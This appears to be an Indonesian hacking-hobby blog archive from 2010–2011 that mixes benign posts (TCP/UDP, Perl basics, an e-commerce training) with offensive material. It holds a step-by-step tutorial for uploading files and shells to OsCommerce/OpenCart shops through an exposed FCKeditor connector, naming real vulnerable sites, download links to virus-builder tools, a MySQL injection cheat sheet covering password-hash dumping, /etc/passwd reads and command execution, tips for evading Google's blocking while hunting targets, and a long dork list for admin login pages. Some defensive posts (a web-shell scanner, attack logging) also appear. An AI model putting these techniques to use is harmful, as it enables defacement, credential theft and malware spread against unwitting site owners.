PrOReBeLL

Terima Kasih Kepada Disperindag Atas Pengadaan Pelatihan Internet Marketing (E-Commerce)

2011-11-04T00:47:00.000-07:00

Dalam meningkatkan ekspor dan impor, Disperindag ( Dinas Perindustrian Dan Perdagangan ) Pekanbaru mengadakan Pelatihan Internet Marketing (E-Commerce) di Premiere Hotel pada tanggal 31-5 November 2011. Hal ini mendapatkan antusias yang luar biasa dari masyarakat kota Pekanbaru. Selain diadakan secara gratis, juga memiliki suatu tema yang sangat berguna bagi perkembangan ekonomi masyarakat via internet ( online ).

Apalagi, dewasa ini siapa sih yang tidak kenal internet ?

Jika anda salah satu dari kelompok yang tidak mengenal internet maka anda juga tidak akan mengetahui perkembangan zaman. Bahkan dengan mengenal internet maka akan sangat bermanfaat bagi pertumbuhan ekonomi masyarakat. Bukankah begitu sangat rugi jika kita tidak mengenal dan memanfaatkan Internet ?

Bahkan saat ini begitu terasa sangat mudah dengan adanya internet, salah satunya di bidang perdagangan secara online. Seperti yang biasa dilakukan dalam situs market online seperti Ebay, Amazon, Alibaba serta transaksi online lainnya. Wilayah cangkupan bisnis / dagang secara online jauh lebih luas dari pada bertransaksi secara langsung ( nyata ).

Maka berdasarkan hal di ataslah masyarakat sangat menyambut gembira dengan di adakannya Pelatihan Internet Marketing Sebagai Media Ekspor dan Impor yang diadakan oleh pemerintahan Disperindag. Semoga dengan adanya pelatihan ini dapat meningkatkan / menghidupkan kembali perekonomian masyarakat pekanbaru.

Maka sangatlah bangga kita sebagai warga pekanbaru telah difasilitasi oleh pemerintah. Sekali lagi kami ucapkan :

Terima Kasih Kepada Disperindag Pekanbaru Atas Penyelenggaraan Pelatihan Internet Marketing (E-Commerce)

Lets Begin To Learn Internet Marketing / Online Transaction !!!

"Powered By OsCommerce " atau "Powered By OpenCart" Vulnerability

2011-03-15T04:19:00.000-07:00

maaf jika beberapa minggu ini saya tidak memposting di blog kesayangan saya ini. dan maaf jika postingan kali ini beberapa teman-teman dan master-master sekalian udah pada tahu :)
cuma ini hanya sekedar share informasi saja :)

TUTORIAL

1. searching target dengan dork "Powered By OsCommerce " atau "Powered By OpenCart" di google, Bing, Atau apa saja

2. tentukan target.

3. Setelah menemukan target tambahkan code Dibawah ini :
"admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html" dibelakang Url/Target (Tanpa tanda kutip)
Exs : http://www.springfieldxd.info/buy/index.php?route=product/product&product_id=57
Jadinya adalah : http://www.springfieldxd.info/buy/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

4. Setelah itu kamu akan menemukan file untuk upload,

5. Untuk Conector, Ganti Asp menjadi PHP file :)

6. Nah sekarang tinggal upload file kalian...!!! Contoh : upload sitelamu.html

Dan hasilnya adalah http://www.target.com/file-kamu.html
Contoh target yang vuln :
http://utahflowers.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
dan hasilnya : http://utahflowers.net/r00t.html

Nb : Jika Anda Beruntung, Anda Juga Bisa Melakukan Upload Shell Kedalam Target :)
Untuk Dork, Gunakan Imajinasi kalian dalam memperluar dork tersebut.

Sekian Postingan Saya Kali Ini, Semoga Berguna Bagi Teman-Teman Semua, Amin.

Virus Maker [ Link Download ]

2011-02-11T20:23:00.000-08:00

Hmm Mungkin Beberapa Teman-Teman Sudah Mengenal Salah Satu Tools Ini, Apakah Ini ??
Yap Bener, sesuai namanya " Virus Maker " Tentunya jga Berfungsi Sebagai creator virus secara instan, tapi ini bkan sebagai notulen virus.
http://www.blogger.com/img/blank.gif
Ya Mungkin Dari Option Yang Ada, Udah Hampir bsa di katakan Lengkap.

Langsung Aja

Virus Maker I :

Link Download :

http://www.mediafire.com/?50c3wjijss9omp4

Mirror :

http://www.mediafire.com/?lacwe8nmd0mn1pd

Virus Maker II :

Link Download :

http://www.mediafire.com/?v323l41gx34pku9

Mirror :

http://www.mediafire.com/?04pc8z99havk6kv

NB : tapi hati-hati bro..
Biasanya software ginian terdeteksi virus dengan antivirus..

" USE UR OWN RISK "

Cara mencegah SQL Injection

2011-02-06T11:21:00.000-08:00

Untuk mencegah terjadinya SQL Injection maka input harus di filter terlebih dahulu untuk menghilangkan karakter-karakter yang tidak diinginkan

ini contoh sebuah fungsi untuk mem-filter input dari user

anggap saja nama filenya adalah sqlfilter.php

function SQLFilter($val){
// Karakter yang sering digunakan untuk sqlInjection
$char = array ('-','/','\\',',','.','#',':',';','\'','"',"'",'[',']','{','}',')','(','|','`','~','!','@','%','$','^','&','*','=','?','+');

// Hilangkan karakter yang telah disebutkan di array $char
$cleanval = str_replace($char, '', trim($val));

return $cleanval;
}
?>

contoh

index.php

include 'connect.php'; anggap saja semua koneksi sudah beres
include 'sqlfilter.php';

$id = SQLFilter($_GET[id]); //saring input dari user
$hasil = mysql_query("SELECT * FROM user WHERE id=$id");
white($row = mysql_fetch_array($result)) {
echo $row['username'];
echo '
';
}
mysql_close();
?>

Semoga bermanfaat :)

sumber : http://forum.devilzc0de.org/thread-5701.html

Mengatasi google error ketika mencari target sqli

2011-01-03T16:12:00.000-08:00

Ketika Anda Sedang Asik2 cari target, tiba2 suatu saat ada sesuatu yang terjadi dari alat pencari anda (mbah google) seperti ini :

mengapa bisa terjadi hal seperti diatas ?
sebenarnya pihak google mengetahui klau ada orang yg menggunakan search engine google untuk mencari bug suatu us, pada awalnya google akan mengijinkan anda untuk mencari bug suatu situs, tapi setelah sampai ke halaman 11 atau ke 12, google akan memblok anda.

solusi :
buat search engine sendiri melalui fasilitas yg disediakan google. caranya :
1.buka http://www.google.com/coop/cse/
2.Klik Create a Custom Search Engine
3.Sebelum membuat search engine ini anda harus memiliki akun google mail untuk konfirmasi, klau udah punya anda tinggal login sja, klau yg belum punya, daftar dulu dong
4.kemudian anda akan masuk ke bagian set up your search engine, isi sesuai dengan keinginan kamu, tapi pada bagian What do you want to search? pilih The entire web, but emphasize sites I select
5.centang I have read and agree to the Terms of Service. lalu klik Next
6.terakhir buka email anda dan lihat link untuk konfirmasinya

nah contohnya ini : http://www.google.com/cse/home?cx=017912594941307489685:cny3l2s4zm4

Tapi Ada Cara Yang Super Duper Ringkas lagi
Anca Coba aja search melalui ini : http://google.com/ncr

Terserah anda mau pilih jalan yang mana. hehehe....

Ref : http://www.xcode.or.id/forum/viewtopic.php?f=99&t=38950

Analisis dan Identifikasi serangan pada situs anda

2011-01-03T15:45:00.000-08:00

Nah ini ane dpt dri forum IHT yang authornya zee eichel (katanya dpt dri omz aurel).
lalu ane coba share jga dsni utk nambah2 pengetahuan kita sebagai newbie :)

Mungkin bagi para administrator yang mempunyai web atau pun blog, jarang yg memperhatikan masalah keamanan. Dimana kebanyakan para web admin berpikir bahwa situs yang mereka kelola itu telah aman 100%, dan di rasa tidak akan ada gangguan dari orang-orang iseng. Tapi jika suatu ketika sang admin situs melihat di browsernya bahwa pada halaman depan situs yang mereka telah berubah tampilan dengan adanya salam khas dari para peretas (cracker / defacer), mereka selalu di hadapkan ke pada penyesalan, marah, dan lain2.

Memang penyesalan selalu datang di akhir brotha…..
Bagaimanakah kita mengantisipasi hal semacam itu…..?
Pada artikel kali ini saya akan coba membuat trik , bagaimana mengidentifikasi serangan sedini mungkin agar tidak terjadi hal-hal yang tidak di inginkan pada situs yang kita kelola.
Disini kita akan mencoba Applikasi Craw Track
Anda bisa mengunjungi di www.crawltrack.net

Peralatan yang dibutuhkan
1. Crawl Track (http://www.crawltrack.net/download/crawltrack3-2-1.zip)
2. Hosting /Domain / Sub Domain

Ok , lansung ke tujuannya….
- Download Crawl Track
- Upload ke hostingan yang anda punya
Disini gw bikin sub domain di site yang gw kelola http://Dark-Note.com sub domainnya saya kasih nama log sehingga alamatnya menjadi http://log.dark-n...
- Nah setelah terupload dengan baik saatnya instalasi crawl tracknya
- Masuk Ke Sub domain yang tadi di bikin, dan anda akan di hadapkan dengan tampilan seperti ini

Disana anda akan disuruh memasukan
o User MySQl
o Password MySQL
o Host MySQL
o Database MySQL

- Setelah memasukan dengan benar maka akan ada tampilan

- setelah itu anda akan disuruh untuk memasukan alamat website yang akan di crawling, silahkan masukan URL situs anda.

- Dan kemudian silahkan setting user name dan password untuk login sebagai admin

Ok, Step Penginstalan Selesai…
Selanjutnya kita akan lanjut ke step menkonfigurasi

- Masuk ke alamat tadi dan masukan user name dan password yg anda gunakan
- Setelah masuk anda akan di tampilkan ke halaman utama

- Klik tombol setting dan akan ada tampilan konfigurasinya

- Pilih Menu Create tags to insert on your website. dan klik sehingga anda akan di beri code kurang lebih seperti ini

code:

Standard tag for a site hosted on the same server as Crawltrack.
$crawltsite=1;
require_once("/home/darkecom/public_html/log/crawltrack.php");

Code ini adalah code yang di generate oleh Crawl Track untuk dimasukan ke dalam file di website qmu.
disini saya memakai PHP FUSION, untuk CMS laen bisa liat source Doc nya disini

http://www.crawltrack.net/doccms.php

Nah, dikarenakan saya memakai PhpFusion, maka code hasil generate tadi akan saya masukkan ke dalam file yang bernama maincore.php di hosting web saya.
sehingga inputan code nya menjadi begini

selanjutnya

1. Masuk ke Crawl Track dan login .
2. pada halaman utama , silahkan mencari Hacking attempts dan Klik untuk melihat History nya

Pada History, terdapat keterangan seperti berikut
- IP Used -------------> adalah IP Attacker yang di log
- Attack ---------------> Jumlah serangan yang dilakukan oleh Attacker
- Attack Details -------> Script yang coba Di Inject beserta Parameter code injection yang digunakan oleh Attacker

berdasarkan history yang di log oleh Crawl Track, Telah di indikasikan adanya serangan terhadap situs yang gw kelola, serangan yang terdeteksi dan yang digunakan oleh Attacker dari ip 208.38.187.136 (USA) , dengan melakukan remote file melalui PHPCentral Poll dimana file yg mau di inject an berasal dari alamat http://www.kyosan.../id1??????.

Berdasarkan log tersebut kita bisa mengantisipasi, dan mencoba mempatching celah yang ada di website gw.

Mudah-mudahan artikel ini berguna bagi yang ingin mengelola site sehingga bisa meminimalkan serangan dari pihak luar...

ref : http://www.indonesianhacker.or.id/threads/4173-Analisis-dan-Identifikasi-serangan-pada-situs-anda

MySQL SQLi Cheat Sheet

2011-01-03T15:39:00.000-08:00

MySQL SQLi Cheat Sheet

-------------------
Version
-------------------
SELECT @@version

------------------------
Comments
------------------------
SELECT 1; #comment
SELECT /*comment*/1;

--------------------------
Current User
-------------------------
SELECT user();
SELECT system_user();

---------------------------------------
List Users
---------------------------------------
SELECT user FROM mysql.user; -- priv

---------------------------------------
List Password Hashes
---------------------------------------
SELECT host, user, password FROM mysql.user; -- priv

---------------------------------------
List Privileges
---------------------------------------
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; -- list user privs

SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs

SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; -- list privs on databases (schemas)

SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; -- list privs on columns

---------------------------------------
List DBA Accounts
---------------------------------------
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';

SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv

---------------------------------------
Current Database
---------------------------------------
SELECT database()

---------------------------------------
List Databases
---------------------------------------
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db -- priv

---------------------------------------
List Columns
---------------------------------------
SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

---------------------------------------
List Tables
---------------------------------------
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'

---------------------------------------
Find Tables From Column Name
---------------------------------------
SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; -- find table which have a column called 'username'

--------------------------------------
Select Nth Row
-------------------------------------
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0

--------------------------------------
Select Nth Char
-------------------------------------
SELECT substr('abcd', 3, 1); # returns c

--------------------------------------
Bitwise AND
-------------------------------------
SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0

--------------------------------------
ASCII Value -> Char
-------------------------------------
SELECT char(65); # returns A

--------------------------------------
Char -> ASCII Value
-------------------------------------
SELECT ascii('A'); # returns 65

--------------------------------------
Casting
-------------------------------------
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);

--------------------------------------
String Concatenation
-------------------------------------
SELECT CONCAT('A','B'); #returns AB
SELECT CONCAT('A','B','C'); # returns ABC

-------------------------------------
If Statement
-------------------------------------
SELECT if(1=1,'foo','bar'); -- returns 'foo'

-------------------------------------
Case Statement
-------------------------------------
SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A

-------------------------------------
Avoiding Quotes
-------------------------------------
SELECT 0x414243; # returns ABC

-------------------------------------
Time Delay
-------------------------------------
SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12

-------------------------------------
Make DNS Requests
-------------------------------------
null

-------------------------------------
Command Execution
-------------------------------------
If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.

-------------------------------------
Local File Access
-------------------------------------
...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system

-------------------------------------
Hostname, IP Address
-------------------------------------
null

-------------------------------------
Create Users
-------------------------------------
CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv

-------------------------------------
Delete Users
-------------------------------------
DROP USER test1; -- priv

-------------------------------------
Make User DBA
-------------------------------------
GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv

-------------------------------------
Location of DB files
-------------------------------------
SELECT @@datadir;

-------------------------------------
Default/System Databases
-------------------------------------
information_schema (>= mysql 5.0)
mysql

Ref : http://www.indonesianhacker.or.id/threads/3422-MySQL-SQLi-Cheat-Sheet

Scanning File2 Backdoor di Site Anda.

2011-01-03T15:31:00.000-08:00

Nah2 udh lama jga ane blum msukin info2 barunya :)
ok deh mumpung ada info bagus nih untuk memperkuat security site kita. salah satunya scannner dri file2 tanaman backdoor para peretas :p

langsung aja deh.. cekibr00t...

Copas Code ini :

#!/usr/bin/php
/*
* this script find some shell like
* c99, c100, r57, erne, Safe_Over
* and try to find some of unknow shell searching specific words this can be
* not safe
*
* how to use:
* the script don't need no-one of these parameter thay are facoltative
* -e Y/N enable disable eusristic mode (default is enable)
* -p a number 1-100 , it's the percentual of word that must be find into the file to warm the euristic mode
* -f check a single file
* -d check a single dir (normaly the program is recursive chek ALL file )
* powered by Dr. nefasto
*/
$euristic__ = array("fopen", "file(", "file_get_contents", "sql", "opendir", "perms", "port", "eval", "system", "exec", "rename", "copy", "delete", "hack", "(\$_", "phpinfo", "uname", "glob", "is_writable", "is_readable", "get_magic_quotes_gpc()", "move_uploaded_file", "\$dir", "& 00", "get");
$word__ = array(
"c99" => array("c999shexit();", "setcookie(\"c999sh_surl\");", "c999_buff_prepare();"),
"c100" => array("\$back_connect_c=\"f0VMRgEBAQA", "function myshellexec(\$command) {", "tEY87ExcilDfgAMhwqM74s6o"),
"r57" => array("if(strpos(ex(\"echo abcr57\"),\"r57\")!=3)", "function ex(\$cfe)", "\$port_bind_bd_c=\"I2luY2x1ZGUg"),
"erne"=> array("function unix2DosTime(\$unixtime = 0)", "eh(\$errno, \$er", "\$mtime=@date(\"Y-m-d H:i:s\",@filemti"),
"Safe_Over" => array("function walkArray(\$array){", "function printpagelink(\$a, \$b, \$link = \"\")", "if (\$cmd != \"downl\")"),
"cmd_asp" => array(" ' -- Read th", "ll oFileSys.D", "Author: Maceo")
);
//the script work
$euristic_active = true;
$euristic_sens = 40;
for ($i = 1; $i < $argc; $i++)
{
if ($argv[$i] == "-h")
help($argv[0]);
elseif($argv[$i] == "-e")
{
if ($argv[$i+1] == "Y") $euristic_active = true;
if ($argv[$i+1] == "N") $euristic_active = false;
}
elseif($argv[$i] == "-p")
$euristic_sens = $argv[$i+1];
elseif($argv[$i] == "-d")
{
dir_scan($argv[$i+1]);
exit;
}
elseif($argv[$i] == "-f")
{
a($argv[$i+1]);
exit;
}
}
dir_scan(".");
function dir_scan($name)
{
if (!is_dir($name))
echo "$name is not a dir\n";
if ($o = @opendir($name))
{
while(false !== ($file = readdir($o)))
{
if ($file == '.' or $file == '..' or $file == basename(__file__)){ continue;}
else if (is_dir($name."/".$file)){dir_scan($name."/".$file);}
else
a($name."/".$file);
}
closedir($o);
}
else
echo "i can't open $name dir\n";
}
function a($file)
{
global $euristic_active;
global $euristic_sens;
if ($l = file_get_contents($file))
{
if ( $shell = check($l))
{
echo "[DANGER] word_list > ".$file."\tprobably ".$shell." shell\n";
}
else if ($euristic_active)
if ($t = check_euristic($l) and $t > $euristic_sens)
{
echo "[_ALERT] euristic $t%> ".$file."\tprobably is a shell\n";
}
}
else
{
echo "i can't open $file file\n";
}
}
function check($string)
{
$check = 0;
global $word__;
foreach($word__ as $shell => $code)
foreach($code as $microcode)
if (stripos($string, $microcode) !== false)
{
$check ++;
if ($check == 3) return $shell;
}
return false;
}
function check_euristic($string)
{
global $euristic__;
$check = 0;
foreach($euristic__ as $code)
if (stripos($string, $code) !== false)
$check++;
return intval(($check * 100) / count($euristic__));
}
function help($me)
{
echo "indonesianhacker shell scanner\n".
"$me {-e [euristic method default = Y] Y/N -p [[0-100] euristic sensibility fewer == most feeble ] [-d [directory] / -f [file] ]}\n".
"exemple: $me -e N -d /tmp\n"
;
exit;
}
?>

Lalu, simpan dengan nama amankan.php ato serah ente dah
panggil url nah ... http://situslo/amankan.php
ntar tinggal liat hasilnah....

Saran Dari Omz zee eichel

TESTI gan .. ane pasang di halaman pertama...

semoga berguna gan ....

ditunggu cendolnya dan rate nya gan ....

Summber : http://www.indonesianhacker.or.id/threads/5747-Scan-File-file-Backdoor-di-situs-anda

Pengertian TCP Dan UDP Serta Perbedaannya.

2010-11-04T05:10:00.001-07:00

PENGERTIAN TCP DAN UDP

TCP adalah dasar dari koneksi,

Hal ini berarti melakukan suatu koneksi langsung antara dua komputer untuk melakukan transfer data antara kedua host. Suatu paket mengandung header dan data gram, pada bagian header dari paket akan mengandung informasi penting tentang :

* Source Port
* Destination Port
* Sequence number
* Acknowledgement number
* Header Length (Standard 20 Bytes)
* Flags (syn, ack, psh, fin, rst, urg)
* Window size
* Checksum
* IP_v4 or IP_v6
* Header Length
* DSF
* Total Length
* Identification
* Flags (Set Fragment bit or not)
* Fragment Offset
* TTL
* Protocol (this case TCP)
* Header checksum
* Source IP
* Destination I

UDP, User Datagram Protocol, adalah TCP yang connectionless. Hal ini berarti bahwa

suatu paket yang dikirim melalui jaringan dan mencapai komputer lain tanpa membuat

suatu koneksi. Sehingga dalam perjalanan ke tujuan paket dapat hilang karena tidak ada

koneksi langsung antara kedua host, jadi UDP sifatnya tidak realibel, tetapi UDP adalah

lebih cepat dari pada TCP karena tidak membutuhkan koneksi langsung.

PERBEDAAN TCP DAN UDP

Berbeda dengan TCP, UDP merupakan connectionless dan tidak ada keandalan, windowing, serta fungsi untuk memastikan data diterima dengan benar. Namun, UDP juga menyediakan fungsi yang sama dengan TCP, seperti transfer data dan multiplexing, tetapi ia melakukannya dengan byte tambahan yang lebih sedikit dalam header UDP.

UDP melakukan multiplexing UDP menggunakan cara yang sama seperti TCP. Satu-satunya perbedaan adalah transport protocol yang digunakan, yaitu UDP. Suatu aplikasi dapat membuka nomor port yang sama pada satu host, tetapi satu menggunakan TCP dan yang satu lagi menggunakan UDP—hal ini tidak biasa, tetapi diperbolehkan. Jika suatu layanan mendukung TCP dan UDP, ia menggunakan nilai yang sama untuk nomor port TCP dan UDP.

UDP mempunyai keuntungan dibandingkan TCP dengan tidak menggunakan field sequence dan acknowledgement. Keuntungan UDP yang paling jelas dari TCP adalah byte tambahan yang lebih sedikit. Di samping itu, UDP tidak perlu menunggu penerimaan atau menyimpan data dalam memory sampai data tersebut diterima. Ini berarti, aplikasi UDP tidak diperlambat oleh proses penerimaan dan memory dapat dibebaskan lebih cepat. Pada tabel, Anda dapat melihat fungsi yang dilakukan (atau tidak dilakukan) oleh UDP atau TCP.

Sejarah Singkat Tentang Perl

2010-11-04T04:06:00.000-07:00

Perl singkatan dari Practical Extraction and Report Language. Perl adalah bahasa yang bersifat open source untuk berbagai platform system operasi seperti : Unix /Linux, MVS, VMS, Ms DOS/Windows, Macintosh, OS/2, Amiga, dsb. Bersifat open source artinya tersedia secara bebas, jadi anda tidak perlu takut masalah pembajakan software seperti ketika anda menggunakan produk Microsoft. Perl dibuat oleh Larry Wall tahun 1986 ketika itu ia diminta untuk menyediakan suatu konfigurasi system manajemen dan control untuk suatu WAN(Wide Area Network). Larry wall dengan menggunakan beberapa tool yang ada telah membangun suatu system yang dapat bekerja pada beberapa platform dan jaringan. Setelah system diinisialisasi, dia melanjutkan dengan mengembangkan perl dan pada tahun 1989 dia melemparkanya ke internet dan terus melanjutkan pengembangannya. Pada perkembangannya saat ini hampir semua operasi di system operasi unix dapat ditangani dengan perl.

Lalu apa saja yang dibutuhkan untuk membuat program dan menjalankan perl ?

o

Interpreter perl (terakhir versi 5), jika anda menggunakan linux biasanya sudah ada pada paket installasi distro. Sedangkan pengguna windows anda bisa menginstall activeperl yaitu distribusi perl untuk windows

o

Text editor, di windows anda bisa memakai notepad, textpad,ultraedit di linux bisa menggunakan vi,emacs

Bagaimana saya membuat dan menjalankan program perl ?

* Pertama tulis kode program dengan text editor, kemudian save as dengan extensi *.pl (namaprogram.pl), contoh : program1.pl , saya.pl , terserah_anda.pl
* Kemudian dari command prompt(win) atau console(linux) ketikan :

perl namaprogram.pl , atau namaprogram.pl

dengan catatan anda telah menginstall perl sebelumnya, jika belum anda akan mendapatkan pesan : command not found, not recognized, dsb.

misalnya saya mempunyai program perl dengan nama hallo.pl maka untuk menjalankanya saya mengetikan :

perl hallo.pl atau bisa juga : hallo.pl

Belajar Dasar Perl

2010-11-04T04:02:00.000-07:00

Perl adalah bahasa pemrograman untuk mesin dengan sistem operasi Unix (SunOS, Linux, BSD, HP-UX), juga tersedia untuk sistem operasi seperti DOS, Windows, PowerPC, BeOS, VMS, EBCDIC, dan PocketPC.

Permulaan belajar bahasa pemrograman perl sama seperti belajar bahasa pemrograman lainnya seperti php, linux dan masih banyak lagi. Pertama-tama kita akan mencoba membuat program helloworld terlebih dahulu, seperti berikut :

#!/usr/bin/perl
# contoh program helloworld
# ini adalah baris komentar
# nama program : helloworld.pl
print "helloworld !!!";
print "selamat datang di perl";

Bagaimana sangat simple bukan? Baris pertama adalah letak interpreter perl. Contoh diatas (#!usr/bin/perl) merupakan letak interpreter perl di unix/linux, jika anda menggunakan ms windows maka ubah sesuai path directory tempat anda menginstall perl. Pada kenya taannya anda bisa saja tidak menuliskan bari s tsb dan program tetap berjalan, namun ketika anda membuat script CGI maka bari s tersebut wajib dituliskan. Kemudian bari s kedua dari program diatas adalah bari s komentar, ya! komentar di perl ditandai dengan #, coba bedakan dengan baris pertama yang mana tanda # diikuti tanda !. Bari s yang dieksekusi oleh perl adalah bari s ke 4 dan 5, yaitu perintah print untuk menampilkan tulisan helloworld dan selamat datang di perl.

Variabel di dalam perl
Variabel di dalam perl ditandai dengan tanda $ , misalnya : $nama , $bilangan , dst. Seperti halnya pada bahasa pemrograman lain variabel di perl bersifat case-sensitive.
contoh penulisan variabel yang benar :

$Nama;
$X;
$nama_saya;
$test1234;
$Hallo_123;

contoh penulisan variabel yang salah :
$ ---> Paling tidak harus diikuti sebuah huruf
$23saya --> harus diawali sebuah huruf bukan angka
$_hallo --> harus diawali sebuah huruf bukan garis bawah
$bulan-3 --> tidak boleh mengandung tanda minus

Tipe data skalar
Sedangkan untuk tipe data di perl terdapat dua jenis yaitu string dan numeric (kedua tipe ini dinamakan tipe skalar), hal ini mempermudah programmer perl karena kita tidak perlu lagi pusing memilih tipe data yang ingin digunakan di dalam program. Selain itu ketika membuat variabel kita tidak perlu menuliskan tipe data yang kita pakai, lalu bagaimana membedakan tipe string dan numeric? Untuk lebih jelas perhatikan contoh berikut :

#!/usr/bin/perl
# contoh variabel scalar di perl
# nama program : variabel.pl
# ini adalah contoh variabel yang bertipe string :

$nama = "Prorebell";
$welcome_to = "\n perl emang keren \n";
$hello123 = ‘selamat datang di perl';

# sedangkan ini adalah contoh variabel bertipe numeric :

$hitung = 500;
$nomor_mahasiswa = 123040015;
$jumlah = 12;
$Hari_ke = 7;

print "$nama";
print "$Hari";
print "$welcome_to";
print "$hello123";
print "$hitung";
print "$nomor_mahasiswa";
print "$jumlah";
print "$Hari_ke";

Dari contoh diatas dapat disimpulkan bahwa variabel string ditandai dengan tanda petik tunggal(‘ ') dan petik dua/ganda (" ") , sedangkan untuk numeric langsung diisikan bilangan ke variabel tersebut tanpa tanda petik.

Apa bedanya petik tunggal dengan petik ganda ?
Bedanya petik tunggal tidak menghiraukan karakter karakter khusus seperti \n (newline), sedangkan petik ganda dapat membaca karakter khusus tersebut untuk lebih jelasnya kita coba saja dalam program.

#!/usr/bin/perl
# contoh program
# membedakan petik tunggal dan petik ganda
# nama program : tanda_petik.pl

$a = "\nprogrammer\n"; # petik ganda
$b = '\nprogrammer\n'; # petik tunggal

print "saya adalah $a";
print "\n"; # spasi
print 'saya adalah $b';
print "\n";

dengan kata lain petik tunggal akan menulis apa adanya , sedangkan petik ganda akan membaca karakter khusus.

List Dork Mbah Gugel Hack Lagi ^^

2010-10-31T02:31:00.000-07:00

intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp

intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -

intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -s?ri?t -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
